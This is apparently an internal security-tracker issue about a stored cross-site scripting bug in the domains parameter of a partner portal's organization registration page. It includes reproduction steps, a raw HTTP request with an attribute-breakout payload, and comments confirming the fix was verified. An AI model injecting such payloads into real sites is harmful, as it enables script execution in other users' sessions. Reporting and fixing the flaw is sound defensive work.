### ISSUE TITLE
SEC-4897 - XSS via domains parameter of the organizaion on /#setup/organization/registration/[org_ID]/1/ page

### ISSUE THREAD

**Issue by prashantjadhav92** [MindMatrix/SecurityTracker#117]
XSS via domains parameter of the organization /#setup/organization/registration/[org_ID]/1/

Steps to reproduce:
1. Visit this page https://partners.acronis.com/#setup/users/list
2. Click on any user
3. Click on the organization name
4. Click view -> Registration tab
5. Set any domain. No it is required to repeat request to /api/AddDomainsForOrganization, but with payload in the "domain" parameter (e.g. using "Edit and repeat" functionality in browser developer tools or via curl). Request example (set proper orgid):

POST /api/AddDomainsForOrganization HTTP/2
Host: partners.acronis.com
Cookie: .ASPXAUTH=<session>;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ar,en;q=0.7,en-GB;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Csrf-Token: 3f8c2d89-d25a-4d1b-9116-92892f40a3a7
X-Requested-With: XMLHttpRequest
Content-Length: 65
Origin: https://partners.acronis.com/
Referer: https://partners.acronis.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"orgid":23112,"domains":"test.com' onmouseover='confirm(165)"
6. Open https://partners.acronis.com/#setup/organization/registration/[org_ID]/1/ (set proper org_ID) and see JS executed

**Comment by PuneetRevclerx** [comment]
@shaileshtayde sir, I have checked the above security issue and JS is getting executed by following the above mentioned steps.

![image](https://user-images.githubusercontent.com/102346181/183899934-1be4219a-2224-4787-812c-40904dba375f.png)

**Comment by HareshKedar** [comment]
@PuneetRevclerx Kindly verify this on pr-52284.dvl.amp.vg

**Comment by PuneetRevclerx** [comment]
@HareshKedar sir, @sunrao sir, I have checked the above security issue and basic functionality on the given branch (https://pr-52284.dvl.amp.vg/) and it's working as expected now.

**Comment by PuneetRevclerx** [comment]
@prashantjadhav92 sir, I have checked above security issue on Acronis production and it's working as expected now.

**Comment by prashantjadhav92** [comment]
I have asked the client to verify this.

**Comment by prashantjadhav92** [comment]
Verified by the client.
